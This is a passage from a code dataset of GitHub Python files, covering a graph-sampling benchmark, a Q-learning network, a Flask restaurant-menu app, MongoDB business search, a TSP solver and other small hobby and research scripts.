return g, feat, labels, n_classes, splitted_idx\n\ndef load_100Mpapers():\n train_id = torch.load(\"/home/ubuntu/data/papers100m_train_id.pt\")\n splitted_idx = dict()\n splitted_idx['train']=train_id\n coo_matrix = sp.load_npz(\"/home/ubuntu/data/ogbn-papers100M_adj.npz\")\n # print(\"before:\",g)\n g = dgl.from_scipy(coo_matrix)\n \n # g = g.formats(\"csc\")\n g = dgl.remove_self_loop(g)\n g = dgl.add_self_loop(g)\n g=g.long()\n # print(g)\n # exit()\n return g, None, None, None, splitted_idx\n\ndef load_livejournal():\n train_id = torch.load(\"/home/ubuntu/data/livejournal_trainid.pt\")\n splitted_idx = dict()\n splitted_idx['train']=train_id\n coo_matrix = sp.load_npz(\"/home/ubuntu/data/livejournal/livejournal_adj.npz\")\n\n g = dgl.from_scipy(coo_matrix)\n\n # g = g.formats(\"csc\")\n g = dgl.remove_self_loop(g)\n g = dgl.add_self_loop(g)\n # print(\"after:\",g)\n # sp.save_npz(\"/home/ubuntu/data/livejournal/livejournal_adj.npzcon\", g.adj(scipy_fmt='coo'))\n g=g.long()\n return g, None, None, None, splitted_idx\n\ndef load_friendster():\n train_id = torch.load(\"/home/ubuntu/data/friendster_trainid.pt\")\n splitted_idx = dict()\n splitted_idx['train']=train_id\n bin_path = \"/home/ubuntu/data/friendster/friendster_adj.bin\"\n g_list, _ = dgl.load_graphs(bin_path)\n g = g_list[0]\n print(\"graph loaded\")\n # train_nid = torch.nonzero(g.ndata[\"train_mask\"], as_tuple=True)[0]\n # test_nid = torch.nonzero(g.ndata[\"test_mask\"], as_tuple=True)[0]\n # val_nid = torch.nonzero(g.ndata[\"val_mask\"], as_tuple=True)[0]\n\n # features = np.random.rand(g.num_nodes(), 128)\n # labels = np.random.randint(0, 3, size=g.num_nodes())\n # feat = torch.tensor(features, dtype=torch.float32)\n # labels = torch.tensor(labels, dtype=torch.int64)\n # n_classes = 3\n # csr_matrix = coo_matrix.tocsr()\n # sp.save_npz(\"/home/ubuntu/data/friendster/friendster_adj_csr.npz\",csr_matrix)\n # print(\"file saved!\")\n # g = dgl.from_scipy(coo_matrix)\n 
print(g.formats())\n # g = g.formats(\"csc\")\n g=g.long()\n return g, None,None,None,splitted_idx\n\ndef matrix_batch_sampler_deepwalk(A: gs.Matrix, seeds, num_steps):\n path = A._graph._CAPI_random_walk(seeds,num_steps)\n return path\n\n\n\ndef benchmark_w_o_relabel(args, matrix, nid):\n print('####################################################DGL deepwalk')\n # sampler = DeepWalkSampler(args.walk_length)\n print(\"train id size:\",len(nid))\n batch_size = args.big_batch\n seedloader = SeedGenerator(\n nid, batch_size=batch_size, shuffle=True, drop_last=False)\n # train_dataloader = DataLoader(g, train_nid, sampler,batch_size=config['batch_size'], use_prefetch_thread=False,\n # shuffle=False,drop_last=False, num_workers=config['num_workers'],device='cuda',use_uva=config['use_uva'])\n \n\n small_batch_size = args.batchsize\n\n #orig_seeds_ptr = torch.arange(num_batches + 1, dtype=torch.int64, device='cuda') * small_batch_size\n print(args.num_epoch, batch_size, small_batch_size)\n \n epoch_time = []\n mem_list = []\n torch.cuda.synchronize()\n static_memory = torch.cuda.memory_allocated()\n print('memory allocated before training:',\n static_memory / (1024 * 1024 * 1024), 'GB')\n for epoch in range(args.num_epoch):\n num_batches = int((batch_size + small_batch_size - 1) / small_batch_size)\n torch.cuda.reset_peak_memory_stats()\n torch.cuda.synchronize()\n start = time.time()\n for it, seeds in enumerate(tqdm.tqdm(seedloader)):\n seeds = seeds.to('cuda')\n # seeds_ptr = orig_seeds_ptr\n if it == len(seedloader) - 1:\n num_batches = int((seeds.numel() + small_batch_size - 1) / small_batch_size)\n paths = matrix_batch_sampler_deepwalk(matrix, seeds, args.walk_length)\n # print(\"paths:\",paths.shape,\"num_batches:\",num_batches)\n split_paths = torch.tensor_split(paths,num_batches)\n # print(len(split_paths))\n # print(split_paths[0].shape)\n # print(len(ptrts[0][0]),len(indts[0][0]))\n # print(len(ptrts[1][0]),len(indts[1][0]))\n\n torch.cuda.synchronize()\n epoch_time.append(time.time() - start)\n mem_list.append((torch.cuda.max_memory_allocated() -\n static_memory) / (1024 * 1024 * 1024))\n\n print(\"Epoch {:05d} | Epoch Sample Time {:.4f} s | GPU Mem Peak {:.4f} GB\"\n .format(epoch, epoch_time[-1], mem_list[-1]))\n\n # use the first epoch to warm up\n print('Average epoch sampling time:', np.mean(epoch_time[1:])*1000,\" ms\")\n print('Average epoch gpu mem peak:', np.mean(mem_list[1:]),\" GB\")\n print('####################################################END')\n\n # sample_list = []\n # static_memory = torch.cuda.memory_allocated()\n # print('memory allocated before training:',\n # static_memory / (1024 * 1024 * 1024), 'GB')\n # tic = time.time()\n # with tqdm.tqdm(train_dataloader) as tq:\n # for step, walks in enumerate(tq):\n # if step > 50:\n # break\n # torch.cuda.synchronize()\n # sampling_time=time.time()-tic\n # sample_list.append(sampling_time)\n # # print(sampling_time)\n # sampling_time = 0\n # torch.cuda.synchronize()\n # tic=time.time()\n \n # print('Average epoch sampling time:', np.mean(sample_list[2:]))\ndef load(dataset,args):\n device = args.device\n use_uva = args.use_uva\n g, features, labels, n_classes, splitted_idx = dataset\n sample_list = []\n static_memory = torch.cuda.memory_allocated()\n train_nid = splitted_idx['train']\n \n if args.data_type == 'int':\n g = g.int()\n train_nid = train_nid.int()\n # print(\"convect to csc\")\n # g = g.formats(\"csc\")\n # print(\"after convert to csc\")\n else:\n g = g.long()\n train_nid = train_nid.long()\n csc_indptr, 
csc_indices, edge_ids = g.adj_sparse('csc')\n    # train_nid = train_nid.int()\n    # csc_indptr = csc_indptr.int()\n    # csc_indices = csc_indices.int()\n    if use_uva and device == 'cpu':\n        csc_indptr = csc_indptr.pin_memory()\n        csc_indices = csc_indices.pin_memory()\n    else:\n        csc_indptr = csc_indptr.to('cuda')\n        csc_indices = csc_indices.to('cuda')\n\n    m = gs.Matrix(gs.Graph(False))\n    m._graph._CAPI_load_csc(csc_indptr, csc_indices)\n    print(\"Check load succeeded:\", m._graph._CAPI_metadata(), '\\n')\n    train_nid = train_nid.to('cuda')\n    # csc_indptr, csc_indices, edge_ids = g.adj_sparse('csc')\n    del g\n    benchmark_w_o_relabel(args, m, train_nid)\n\n\n\nif __name__ == '__main__':\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--device\", default='cuda', choices=['cuda', 'cpu'],\n                        help=\"Training model on gpu or cpu\")\n    parser.add_argument('--use-uva', action=argparse.BooleanOptionalAction,\n                        help=\"Whether to use UVA to sample the graph and load features\")\n    parser.add_argument(\"--dataset\", default='products', choices=['reddit', 'products', 'papers100m','friendster','livejournal'],\n                        help=\"which dataset to load for training\")\n    parser.add_argument(\"--batchsize\", type=int, default=128,\n                        help=\"batch size for training\")\n    parser.add_argument(\"--num-epoch\", type=int, default=3,\n                        help=\"number of epochs in training\")\n    parser.add_argument(\"--data-type\", default='long', choices=['int', 'long'],\n                        help=\"data type\")\n    parser.add_argument(\"--walk-length\", type=int, default=80,\n                        help=\"random walk walk length\")\n    parser.add_argument(\"--big-batch\", type=int, default=1280,\n                        help=\"big batch\")\n    args = parser.parse_args()\n    print('Loading data')\n    if args.dataset == 'products':\n        dataset = load_ogbn_products()\n    elif args.dataset == 'papers100m':\n        dataset = load_100Mpapers()\n    elif args.dataset == 'friendster':\n        dataset = load_friendster()\n    elif args.dataset == 'livejournal':\n        dataset = load_livejournal()\n    print(dataset[0])\n    load(dataset,args)\n","repo_name":"Liu-rj/gs-experiments","sub_path":"main_exp_sampling/simple_algorithms/deepwalk/deepwalk_matrix.py","file_name":"deepwalk_matrix.py","file_ext":"py","file_size_in_byte":9155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
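# Minimal, self-contained illustration of the big-batch bookkeeping used in
# benchmark_w_o_relabel above: the ceil-division batch count and the
# torch.tensor_split slicing. The walk tensor shape is an assumption (one
# length-80 walk plus its seed per row); no graph or sampling is involved here.
import torch

big_batch, small_batch = 1280, 128
paths = torch.zeros(big_batch, 81)  # assumed shape: one walk (+ seed) per seed node
num_batches = (big_batch + small_batch - 1) // small_batch  # ceil division -> 10
chunks = torch.tensor_split(paths, num_batches)
assert len(chunks) == 10 and all(c.shape[0] == 128 for c in chunks)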
+{"seq_id":"73416159914","text":"import numpy as np \nimport math \nimport pandas as pd \nimport itertools\nfrom matplotlib import pyplot as plt\nimport matplotlib.animation as animation\nfrom numpy import savetxt\nfrom celluloid import Camera\nimport time\nimport geopandas as gpd\n\ndatafile = 'data_for_choro.csv'\ndf = pd.read_csv(datafile)\ndf_test = pd.DataFrame(df[['a', 'b', 'c']].values)\n\ndf2 = pd.DataFrame(columns=list('abc'))\nfor i in range(4619):\n\tyear = 1896 + (4 * int(i/149))\n\tcountry = df_test[1][i]\n\tmedals = 0\n\tdf2 = df2.append({'a': year, 'b': country, 'c': medals}, ignore_index=True)\n\nprint(df2)\n\ntotals = []\n\nfor i in range(149):\n\ttotals.append(0)\n\nfor j in range(4619):\n\tcurr = j % 149\n\t#curr1 = int(j / 149)\n\t#year = 1896 + (4 * curr1)\n\tyear = df_test[0][j]\n\tcountry = df_test[1][j]\n\tnum1 = df_test[2][j]\n\n\tif(j>=149):\t\n\t\tdf2.loc[df2.a.isin([year]) & df2.b.isin([country]), 'c'] += (num1 + totals[curr])\n\telse:\n\t\tdf2.loc[df2.a.isin([year]) & df2.b.isin([country]), 'c'] += num1 \n\n\ttotals[curr] += num1\n\t\nprint(df2)\ndf2.to_csv(r'total_choro.csv', index=False)\n","repo_name":"GrahamHutchinso6275/Data-Vis-Module","sub_path":"grahamhutchinson_assignment3/get_total_choro.py","file_name":"get_total_choro.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23817420528","text":"# Environment variables\nimport os\nos.environ['something'] = 'something'\n\n\n# loops\nfor num in range(1,100,2):\n    print(num)\n\n    \n# Named tuple (More readable way of representing tuples - object like)\n# Regular way \npt1 = (1.0, 5.0)\npt2 = (2.5, 1.5)\nfrom math import sqrt\nline_length = sqrt((pt1[0]-pt2[0])**2 + (pt1[1]-pt2[1])**2)\n# Named tuple way\nfrom collections import namedtuple\nPoint = namedtuple('Point', 'x y')\npt1 = Point(1.0, 5.0)\npt2 = Point(2.5, 1.5)\nfrom math import sqrt\nline_length = sqrt((pt1.x-pt2.x)**2 + (pt1.y-pt2.y)**2)\n\n# A data class comes with basic functionality already implemented. \n# For instance, you can instantiate, print, \n# and compare data class instances straight out of the box\nfrom dataclasses import dataclass\n@dataclass\nclass DataClassCard:\n    rank: str\n    suit: str\n\n","repo_name":"rsirimalla/scratchpad","sub_path":"python_ref.py","file_name":"python_ref.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27546659078","text":"import pyglet\n\nimport resources\n\nclass Title(pyglet.sprite.Sprite):\n    def __init__(self, *args, **kwargs):\n        super(Title, self).__init__(img=resources.crow_logo, x=760, y=40,\n                                    *args, **kwargs)\n        self.game_title = pyglet.text.Label(\"Poke\", font_size = 36,\n                                            anchor_y=\"top\", x=40, y=560,\n                                            color=(0,0,0,255))\n        self.credits = pyglet.text.Label(\"A game by Lena LeRay\",\n                                         x=40, y=485, color=(0,0,0,255))\n        self.timer = 200","repo_name":"Crowbeak/LD26","sub_path":"game/intro.py","file_name":"intro.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3058561408","text":"from os import system\n\nSTEPS = [\n    {\n        \"name\": \"Switch to the first stage\",\n        # language=Bash\n        \"cmd\": \"git checkout first-stage\",\n    },\n    {\n        \"name\": \"Switch to the second stage\",\n        # language=Bash\n        \"cmd\": \"git checkout second-stage\",\n    }\n]\n\nEXIT_COMMAND = {\n    \"name\": \"Exit\",\n    # language=Bash\n    \"cmd\": \"exit\"\n    }\n\nanswer = \"-1\"\nwhile not (answer.isnumeric() and int(answer) in range(len(STEPS)+1)):\n    print(\"Choose a command:\")\n    for i in range(len(STEPS)):\n        print(\"%s: %s\" % (i+1, STEPS[i]['name']))\n\n    print(\"0: %s\" % EXIT_COMMAND['name'])\n    try:\n        answer = input()\n    except KeyboardInterrupt:\n        answer = \"0\"\n        break\n\n\nSTEPS.insert(0, EXIT_COMMAND)\n\nprint(\"Executing the action...\")\nsystem(STEPS[int(answer)][\"cmd\"])\n","repo_name":"jag-k/1000listnick-it","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27333664965","text":"import numpy as np\nimport tensorflow as tf\nfrom ..utils import *\nfrom . 
import DiscreteQBuilder, NetworkBuilder, DiscreteBellmanBuilder\n\nclass QNetGraph(object):\n def __init__(self, global_step):\n self._summaries = None\n self._global_step = global_step\n\n def set_summaries(self, summaries):\n self._summaries = summaries\n\n def set_value_network(self, input, output, scope):\n self._value_in = input\n self._value_out = output\n self._value_scope = scope\n\n def set_update(self, update):\n self._target_update = update\n\n def set_bellman_ops(self, bnet):\n self._bellman_chosen = bnet.action\n self._bellman_reward = bnet.reward\n self._bellman_next = bnet.state\n self._bellman_terminal = bnet.terminal\n self._bellman_targetQ = bnet.updated_q\n\n def set_training_ops(self, loss, train):\n self._train_loss = loss\n self._train_step = train\n\n def get_actions(self, state, session):\n # batchify state\n state = state[np.newaxis, :]\n return session.run([self._value_out], feed_dict={self._value_in:state})[0]\n\n def _train_feed(self, qs):\n actions = np.reshape(qs.action, (len(qs.action),))\n feed = {self._value_in: qs.current,\n self._bellman_next: qs.next,\n self._bellman_chosen: actions,\n self._bellman_reward: qs.reward,\n self._bellman_terminal: qs.terminal}\n return feed\n\n def train_step(self, qs, session, summary_writer=None):\n feed = self._train_feed(qs)\n if summary_writer is None:\n _, loss = session.run([self._train_step, self._train_loss], feed_dict = feed)\n else:\n _, loss, smr, step = session.run([self._train_step, self._train_loss, self._summaries, self._global_step], feed_dict = feed)\n summary_writer.add_summary(smr, step)\n return loss\n\n def update_target(self, session):\n session.run(self._target_update)\n\nclass QNet(NetworkBuilder):\n def __init__(self, state_size, history_length, num_actions, arch, \n double_q=False, dueling=False):\n super(QNet, self).__init__(state_size = state_size, history_length = history_length, num_actions = num_actions)\n\n self._double_q = double_q\n self._dueling_arch = dueling\n self._q_builder = DiscreteQBuilder(state_size, history_length, num_actions, arch, dueling = dueling)\n\n def _build(self, optimizer, inputs=None):\n gstep = tf.Variable(0, dtype=tf.int64, trainable=False, name=\"global_step\")\n discount = tf.Variable(0.99, dtype=tf.float32, trainable=False, name='discount')\n chosen = tf.placeholder(tf.int32,[None], name=\"action\")\n \n # grouping these so the graph visualization looks nicer\n with tf.name_scope(\"transition\"):\n reward = tf.placeholder(tf.float32, [None], name=\"reward\")\n terminal = tf.placeholder(tf.bool, [None], name=\"terminal\")\n nstate = self.make_state_input(name=\"next_state\")\n\n self._qnet = QNetGraph(gstep)\n\n state = self.make_state_input()\n v = self._q_builder.build(name_scope=\"qnet\", var_scope=\"qnet\", inputs={\"state\": state})\n self._qnet.set_value_network(input = v.state, output = v.q_values, scope = v.scope)\n self._summaries += v.summaries\n\n target_scope = copy_variables_to_scope(v.scope, \"target_vars\")\n with tf.name_scope(target_scope.name+\"/\"):\n update = assign_from_scope(v.scope, target_scope, \"update\")\n \n self._qnet.set_update(update)\n\n bb = DiscreteBellmanBuilder(history_length = self.history_length, state_size = self.state_size, \n num_actions = self.num_actions, double_q = self._double_q)\n inputs = {\"discount\": discount, \"reward\": reward, \"terminal\": terminal, \"action\": chosen,\n \"next_state\": nstate, \"state\": state}\n b = bb.build(qbuilder = self._q_builder, value_scope = v.scope, \n target_scope = target_scope, 
inputs = inputs)\n self._summaries += b.summaries\n self._qnet.set_bellman_ops(b)\n\n with tf.name_scope(\"current_Q\"):\n current_q = choose_from_array(v.q_values, chosen)\n self._summaries.append(tf.summary.scalar(\"mean_Q\", tf.reduce_mean(current_q)))\n\n self._build_training(optimizer, current_q, b.updated_q)\n self._qnet.set_summaries(tf.summary.merge(self._summaries))\n self._summaries = []\n\n return self._qnet\n\n\n def _build_training(self, optimizer, current_q, target_q):\n with tf.variable_scope(\"training\"):\n num_samples = tf.shape(current_q)[0]\n loss = tf.losses.mean_squared_error(current_q, tf.stop_gradient(target_q), scope='loss')\n # error clipping\n with tf.name_scope(\"clipped_error_gradient\"):\n bound = 1.0/tf.to_float(num_samples)\n q_error = tf.clip_by_value(tf.gradients(loss, [current_q])[0], -bound, bound)\n\n # get all further gradients\n tvars = tf.trainable_variables()\n tgrads = tf.gradients(current_q, tvars, q_error)\n grads_and_vars = zip(tgrads, tvars)\n\n self._summaries.append(tf.summary.scalar(\"loss\", loss))\n train = optimizer.apply_gradients(grads_and_vars, global_step=self._qnet._global_step)\n \n self._qnet.set_training_ops(loss = loss, train = train)\n return self._qnet\n","repo_name":"ngc92/neural-control","sub_path":"deepq/deepq/controllers/networks/qnet.py","file_name":"qnet.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40669229498","text":"# # ETL - Extract, Transform and Load of Barzinga data\nimport pandas as pd\nimport json\n\ndf = pd.read_json('data/barzinga_labeled_products.json')\ndf.count()\n\nproducts = []\nfor i in df.index:\n product = {\n 'id': str(df['id'][i]),\n 'description': df['description'][i],\n 'label': i\n }\n products.append(product)\n\nwith open('data/products_dict.json', 'w') as f:\n json.dump(products, f)\n","repo_name":"gabibatista/barzingaML","sub_path":"products_data_processing.py","file_name":"products_data_processing.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25992500908","text":"from flask import Flask, render_template, request, redirect, url_for, flash, jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Restaurant, Base, MenuItem\n \napp = Flask(__name__)\n\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.bind = engine\n \nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n#Making API endpoints (GET request)\n@app.route('/restaurants/JSON')\ndef restaurantJSON():\n restaurants = session.query(Restaurant)\n return jsonify(Restaurant=[i.serialize for i in restaurants])\n\n@app.route('/restaurants/<int:restaurant_id>/menu/JSON')\ndef restaurantMenusJSON(restaurant_id):\n restaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n items = session.query(MenuItem).filter_by(restaurant_id = restaurant.id)\n return jsonify(MenuItems=[i.serialize for i in items])\n\n@app.route('/restaurants/<int:restaurant_id>/menu/<int:menu_id>/JSON')\ndef menuJSON(restaurant_id, menu_id):\n menu = session.query(MenuItem).filter_by(id = menu_id).one()\n return jsonify(MenuItems=menu.serialize)\n\n@app.route('/')\n@app.route('/restaurants/<int:restaurant_id>/')\ndef restaurantMenu(restaurant_id):\n restaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n items = 
session.query(MenuItem).filter_by(restaurant_id = restaurant.id)\n return render_template('menu.html', restaurant=restaurant, items=items)\n\n\n@app.route('/restaurants/<int:restaurant_id>/new', methods=['GET', 'POST'])\ndef newMenuItem(restaurant_id):\n if request.method == 'POST':\n newItem = MenuItem(name = request.form['name'], description = request.form['description'], price = request.form['price'], course = request.form['course'], restaurant_id = restaurant_id)\n session.add(newItem)\n session.commit()\n flash(\"new menu item created!\")\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('newmenuitem.html', restaurant_id = restaurant_id)\n\n\n@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/edit', methods=['GET', 'POST'])\ndef editMenuItem(restaurant_id, menu_id):\n menu = session.query(MenuItem).filter_by(id = menu_id).one()\n if request.method == 'POST':\n if len(request.form['name'].strip()) > 1:\n menu.name = request.form['name']\n if len(request.form['description'].strip()) > 1:\n menu.description = request.form['description']\n if len(request.form['price'].strip()) > 1:\n menu.price = request.form['price']\n if len(request.form['course'].strip()) > 1:\n menu.course = request.form['course']\n session.add(menu)\n session.commit()\n flash(\"menu item edited!\")\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('editmenuitem.html', restaurant_id = restaurant_id, menu=menu)\n\n\n@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/delete', methods=['GET', 'POST'])\ndef deleteMenuItem(restaurant_id, menu_id):\n menu = session.query(MenuItem).filter_by(id = menu_id).one()\n if request.method == 'POST':\n session.delete(menu)\n session.commit()\n flash(\"menu item deleted!\")\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('deletemenuitem.html', restaurant_id = restaurant_id, item=menu)\n\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='0.0.0.0', port=5000)","repo_name":"VioletaCalvo/udacity-fullstack","sub_path":"P3_item_catalog/vagrant/exercises/full-stack-foundations/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11014322671","text":"import xml.etree.ElementTree as et\nimport base64\nfrom optparse import OptionParser\n\n\ndef main():\n parser = OptionParser()\n parser.add_option(\"-l\", \"--lvbitxfile\", dest=\"lvbitxfile\",\n help=\"donor labview fpga bitfile\", metavar=\"LVBITXFILE\")\n\n parser.add_option(\"-b\", \"--bitfile\", dest=\"bitfile\",\n help=\"xilinx generated bitfile\", metavar=\"BITFILE\")\n\n parser.add_option(\"-o\", \"--output\", dest=\"outfile\",\n help=\"output labview fpga bitfile\", metavar=\"OUTFILE\")\n\n parser.add_option(\"-s\", \"--signature\", dest=\"signature\",\n help=\"output labview fpga bitfile signature\", metavar=\"SIGNATURE\",\n default=\"ABCDEFG\")\n\n\n (options, args) = parser.parse_args()\n\n tree = et.parse(options.lvbitxfile)\n root = tree.getroot()\n bs = root.find('Bitstream')\n if bs is None: return\n\n print('Found \"%s\" tag in \"%s\"...' % (bs.tag, options.lvbitxfile))\n\n print('Writing old bitfile content to \"%s\"...' 
% (options.bitfile+'.bak'))\n    f_old = open(options.bitfile+'.bak', 'w')\n    f_old.write(base64.b64decode(bs.text))\n    f_old.close()\n\n\n    print('Reading new bitfile \"%s\"...' % options.bitfile)\n    f = open(options.bitfile, 'r')\n    newbs = base64.b64encode(f.read())\n    f.close()\n\n\n    bs.text = newbs\n    print('Saving new labview bitfile to \"%s\"...' % options.outfile)\n    tree.write(options.outfile, xml_declaration=True, encoding='utf-8')\n\nif __name__ == '__main__':\n    try:\n        main()\n    except KeyboardInterrupt:\n        pass\n","repo_name":"WindyCitySDR/uhd-e300-dev","sub_path":"fpga/usrp3/top/python/make_lvbitx.py","file_name":"make_lvbitx.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15503738811","text":"#\n# DDS Mini Project Interface\n# Name: Blessy Hadassa Konedana\n#\n\n\nfrom pymongo import MongoClient\nimport math\nimport os\nimport sys\nimport json\n\ndef DistanceFunction(lat2, long2, lat1, long1): #defining a function to calculate distance using latitude and longitude\n    R=3959\n    x2 = math.radians(lat2)\n    x1 = math.radians(lat1)\n    diff_x = math.radians(lat2-lat1)\n    diff_y = math.radians(long2-long1)\n    a = math.sin(diff_x/2) * math.sin(diff_x/2) + math.cos(x2) * math.cos(x1) * math.sin(diff_y/2) * math.sin(diff_y/2)\n    c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\n    d = R * c\n    return d\n\ndef FindBusinessBasedOnCity(cityToSearch, saveLocation1, collection): \n    BusinessOnCity = open(saveLocation1, 'w')\t\t\t\t# opening saved location1\n    result = []\t\n    for i in collection.find({'city':cityToSearch.capitalize()}):\n    \t# city search\n\t    value = i['name']+\"$\"+i['full_address'].replace('\\n',',')+\"$\"+i['city']+\"$\"+i['state'] # Storing it in given format\n\t    result.append(value)\t\t\t\t# Storing it in results\n    for i in result:\n\t    BusinessOnCity.write(i.upper()+\"\\n\")\t# writing the output file\n    BusinessOnCity.close()\n\ndef FindBusinessBasedOnLocation(categoriesToSearch, myLocation, maxDistance, saveLocation2, collection):\n    BusinessOnLocation = open(saveLocation2, \"w\") # opening saved location2\n    lat1 = float(myLocation[0])\n    long1 = float(myLocation[1])\n\n    for business in collection.find(): \n        categories = business['categories'] # storing all the categories of businesses\n        if not set(categories).isdisjoint(categoriesToSearch): \n            lat2 = float(business['latitude'])\n            long2 = float(business['longitude'])\n            dist = DistanceFunction(lat1, long1, lat2, long2) # finding the distance using predefined function\n            if dist <= maxDistance:\n                BusinessOnLocation.write(\"{}\\n\".format(business['name'].upper())) # writing the output file \n    BusinessOnLocation.close()\n\n","repo_name":"Kbhadassah777/MongoDB_Search","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22839247756","text":"import sys\nsys.stdin = open('Python\\\\25th\\\\input','r')\ninput = sys.stdin.readline\nN = int(input())\nW = [list(map(int,input().split())) for _ in range(N)]\nINF = float('inf')\n\ndp = [[0 for i in range(1<<N)] for j in range(N)]\n\ndef TSP(n,s,v): # minimum-cost path from city n back to the start city s, given visited set {v}\n    if dp[n][v]:\n        return dp[n][v] # reuse the memoized DP value\n    \n    if v == (1<<N)-1: # every city has been visited,\n        if W[n][s] > 0: # and we can return from here to the start,\n            return W[n][s] # so return that cost\n        return INF # otherwise return infinity\n\n\n    min_cost = INF\n    for i in range(N): # otherwise, search for the best next city\n        if W[n][i] == 0:\n            continue\n        if (1<<i) & v:\n            continue\n        # skip cities that are unreachable or already visited\n        min_cost = min(min_cost,W[n][i] + TSP(i,s,v|(1<<i)))\n        # among the costs of moving to a next city and then returning to the start,\n        # keep the minimum as the best cost of returning to the start from the current city.\n    dp[n][v] = min_cost\n    return dp[n][v]\n\nprint(TSP(N//2,N//2,1<<N//2)) # any start city works, so try starting from around the middle","repo_name":"code-enig/Python","sub_path":"25th/외판원순회2통과.py","file_name":"외판원순회2통과.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
for act in Action.__members__.values()])\n actions = game.valid_actions()\n\n action_child_pair = {}\n for move in actions:\n state = copy.deepcopy(game)\n root_child = MCT(state=state)\n root_child, _ = mcts.roll_out(root=root_child, state=state, depth=10)\n actions_dict[\n move] = root_child.get_game_state().get_weighted_score() + 2 # for normalizing -1 to 1, differentiating 0\n action_child_pair[move] = root_child\n max_score = np.max([child.get_score() for child in action_child_pair.values()])\n candidates = [action for action, node in action_child_pair.items() if node.get_score() == max_score]\n\n action_scores = np.array(list(actions_dict.values()))\n softmax_scores = [score / np.sum(action_scores) for score in action_scores]\n desired_output.append(softmax_scores)\n\n game.do_action(random.choice(candidates))\n count += 1\n end = time.time()\n print(\"size %d goal %d game %d done, time : %s\" % (size, goal, count, str(end - start)))\n # count -= 1\n\n with open(file_name, \"wb\") as f:\n pk.dump((state_data, desired_output), f)\n\n\nif __name__ == '__main__':\n\n game_sizes = [(3, 128), (3, 256), (4, 512), (4, 1024), (4, 2048)]\n for size, goal in game_sizes:\n print(\"Starting to generate data for game size %d, goal%d\" % (size, goal))\n data_generator(size, goal)\n print(\"Complete generating data\")\n","repo_name":"EmilioLrp/CIS667_2048_game","sub_path":"training_data_generator.py","file_name":"training_data_generator.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"21662270625","text":"from pynput.keyboard import Key, Controller as k_controller\r\nfrom pynput.mouse import Button, Controller as m_controller\r\nimport time\r\nimport tkinter as tk\r\n\r\nkeyboard = k_controller()\r\nmouse = m_controller()\r\n\r\ndoing_something = False\r\nduree_activation = 1 # in hour\r\ntime_between_refresh = 20 # in minutes\r\nt1 = time.time()\r\nt2 = time.time()\r\n\r\nroot = tk.Tk()\r\n\r\n\r\ndef get_entry():\r\n global time_between_refresh\r\n global duree_activation\r\n global doing_something\r\n time_between_refresh = time_between_refresh_entry.get()\r\n duree_activation = duree_activation_entry.get()\r\n # doing_something = doing_something_true.getboolean()\r\n print(time_between_refresh, duree_activation, doing_something)\r\n\r\n\r\ntime_between_refresh_txt = \"\"\r\ntime_between_refresh_label = tk.Label(\r\n root, text=\"temps entre refresh\", font=(\"bold\", 14), pady=20\r\n)\r\ntime_between_refresh_label.grid(row=0, column=0)\r\ntime_between_refresh_entry = tk.Entry(root, textvariable=time_between_refresh_txt)\r\ntime_between_refresh_entry.grid(row=0, column=1)\r\n\r\nduree_activation_txt = \"\"\r\nduree_activation_label = tk.Label(root, text=\"durée d'activation\", font=(\"bold\", 14))\r\nduree_activation_label.grid(row=0, column=3)\r\nduree_activation_entry = tk.Entry(root, textvariable=duree_activation_txt)\r\nduree_activation_entry.grid(row=0, column=4)\r\n\r\ndoing_something_true = tk.Checkbutton(root, text=\"qqc en même temps\")\r\ndoing_something_true.grid(row=1, column=1)\r\ndoing_something_false = tk.Checkbutton(root, text=\"rien en même temps\")\r\ndoing_something_false.grid(row=1, column=3)\r\n\r\nok_btn = tk.Button(root, text=\"Ok\", font=(\"bold\", 14), width=10, command=get_entry)\r\nok_btn.grid(row=2, column=2)\r\n\r\nroot.mainloop()\r\n\r\n# while t2 - t1 < duree_activation * 360:\r\n# 